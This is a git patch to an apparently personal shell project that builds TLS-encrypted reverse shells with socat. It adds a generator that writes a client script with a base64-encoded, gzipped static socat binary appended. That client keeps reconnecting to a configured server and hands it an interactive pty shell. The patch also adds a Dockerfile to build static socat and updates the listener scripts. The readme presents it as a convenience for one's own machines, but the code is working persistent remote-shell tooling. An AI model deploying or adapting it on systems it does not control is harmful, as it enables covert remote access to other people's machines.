From 639e50050702d094a9464cf263995f7f19079eaf Mon Sep 17 00:00:00 2001 From: Mitchell Riedstra Date: Mon, 26 Dec 2022 13:06:48 -0500 Subject: Add an option for embedded socat in the client --- .gitignore | 5 ++--- genclient-embed.sh | 48 ++++++++++++++++++++++++++++++++++++++++++++++++ genclient.sh | 7 +++++-- lib/spawn | 13 ++++++++----- readme.md | 7 +++++++ server.sh | 4 ++-- socat/Dockerfile | 13 +++++++++++++ socat/build.sh | 5 +++++ vars | 4 +++- 9 files changed, 93 insertions(+), 13 deletions(-) create mode 100755 genclient-embed.sh create mode 100644 socat/Dockerfile create mode 100755 socat/build.sh diff --git a/.gitignore b/.gitignore index fa375dd..09239be 100644 --- a/.gitignore +++ b/.gitignore @@ -1,3 +1,2 @@ -*.crt -*.key -*.pem +/keys/* +/socat/socat diff --git a/genclient-embed.sh b/genclient-embed.sh new file mode 100755 index 0000000..8c4c144 --- /dev/null +++ b/genclient-embed.sh @@ -0,0 +1,48 @@ +#!/bin/sh + +. ./vars + +help() { +cat < "\$socat" + +chmod +x "\$socat" + +_shell="\$(which zsh mksh bash ksh zsh ash sh 2>/dev/null | sed 1q)" +certificate='$(cat ${basename}.crt)' +crt_tmp="\$(mktemp)" +trap 'rm -f \$crt_tmp \$socat; exit 0' EXIT INT +echo "\$certificate" > "\$crt_tmp" +while [ $loop -ne 0 ] ; do +"\$socat" exec:"\$_shell",pty,stderr,setsid,sigint,sane \\ + "OPENSSL:$hostname:$port,verify=$verify,cafile=\$crt_tmp" +sleep $timeout +done + +exit 0 + +__BEGIN_SOCAT__ +EOF + +if [ -e socat/socat ] ; then + gzip -9c < socat/socat | base64 +fi + diff --git a/genclient.sh b/genclient.sh index 9984a8b..6e2cda2 100755 --- a/genclient.sh +++ b/genclient.sh @@ -23,10 +23,13 @@ cat < "\$crt_tmp" while [ $loop -ne 0 ] ; do -socat exec:"\$_shell",pty,stderr,setsid,sigint,sane OPENSSL:$hostname:$port,verify=$verify,cafile=\$crt_tmp +socat exec:"\$_shell",pty,stderr,setsid,sigint,sane \\ + "OPENSSL:$hostname:$port,verify=$verify,cafile=\$crt_tmp" sleep $timeout done -rm "\$crt_tmp" + +exit 0 EOF diff --git a/lib/spawn b/lib/spawn index 1d19aa4..1b30c19 100755 --- a/lib/spawn +++ b/lib/spawn @@ -4,16 +4,19 @@ SOCKDIR=$(mktemp -d) SOCKF=${SOCKDIR}/usock +trap 'rm -rf $SOCKDIR' EXIT INT + # Start tmux, if needed -if ! tmux ls | grep -q rshsh; then - tmux new -s rshsh -d +if ! tmux ls | grep -q "$tmux_session"; then + tmux new -s "$tmux_session" -d fi # Create window -tmux new-window -t rshsh "socat UNIX-LISTEN:${SOCKF},umask=0077 file:\$(tty),raw,echo=0" +tmux new-window -t "$tmux_session" \ + "stty raw -echo ; socat file:\$(tty),raw,echo=0 UNIX-LISTEN:${SOCKF},umask=0077" # Wait for socket -while test ! -e ${SOCKF} ; do sleep 1 ; done +while test ! -e "${SOCKF}" ; do sleep 1 ; done # Use socat to ship data between the unix socket and STDIO. -exec socat STDIO UNIX-CONNECT:${SOCKF} +exec socat STDIO "UNIX-CONNECT:${SOCKF}" diff --git a/readme.md b/readme.md index 7312a11..7c266c0 100644 --- a/readme.md +++ b/readme.md @@ -31,6 +31,13 @@ $ ./genclient.sh > /tmp/client.sh And you can `scp` it off to your other boxes or whatever. Even copy and paste works. +## Building static socat + +In the `socat` directory there's a `build.sh` that can be used to build +a statically linked socat binary. + +There's a script `genclient-embed.sh` which can then be used to generate a +client script that has socat embedded. ## Attaching to a connected reverse shell diff --git a/server.sh b/server.sh index 32d7fe0..1e61e42 100755 --- a/server.sh +++ b/server.sh @@ -12,7 +12,7 @@ EOF while [ $# -gt 0 ] ; do case $1 in -p) port="$2"; shift ; shift ;; -k) key="$2"; shift ; shift ;; - *) help ;; + *) help ; exit 1;; esac ; done if ! [ -e "$key" ] ; then @@ -20,4 +20,4 @@ if ! [ -e "$key" ] ; then cat "${basename}.key" "${basename}.crt" > "${basename}.pem" fi -socat OPENSSL-LISTEN:${port},cert=${key},reuseaddr,verify=0,fork EXEC:lib/spawn +socat "OPENSSL-LISTEN:${port},cert=${key},reuseaddr,verify=0,fork" "EXEC:lib/spawn" diff --git a/socat/Dockerfile b/socat/Dockerfile new file mode 100644 index 0000000..1cfd72a --- /dev/null +++ b/socat/Dockerfile @@ -0,0 +1,13 @@ +FROM docker.io/alpine:latest +ARG SOCAT_VERSION + +RUN apk add gcc make alpine-sdk openssl-dev openssl-libs-static + +RUN wget http://www.dest-unreach.org/socat/download/socat-$SOCAT_VERSION.tar.gz + +RUN tar xfzv socat-$SOCAT_VERSION.tar.gz + +WORKDIR /socat-$SOCAT_VERSION + +RUN env LDFLAGS=-static ./configure --enable-openssl && make -j$(nproc) + diff --git a/socat/build.sh b/socat/build.sh new file mode 100755 index 0000000..e50e5bf --- /dev/null +++ b/socat/build.sh @@ -0,0 +1,5 @@ +#!/bin/sh +SOCAT_VERSION=1.7.3.4 +image=socat-builder:latest +buildah build --build-arg SOCAT_VERSION=$SOCAT_VERSION -t $image . +podman run --rm -v "$(pwd)":/out/ $image cp -v /socat-$SOCAT_VERSION/socat /out/ diff --git a/vars b/vars index 03bb7b2..319fbaa 100644 --- a/vars +++ b/vars @@ -1,7 +1,9 @@ #!/bin/sh +# What tmux session are we going to use for this? +tmux_session="rshsh" # Server's hostname -hostname="do.rygel.us" +hostname="changeme.example.com" # Do we verify the server certificate? verify=1 # This is used to tell the client script whether it should loop in infinity -- cgit v1.2.3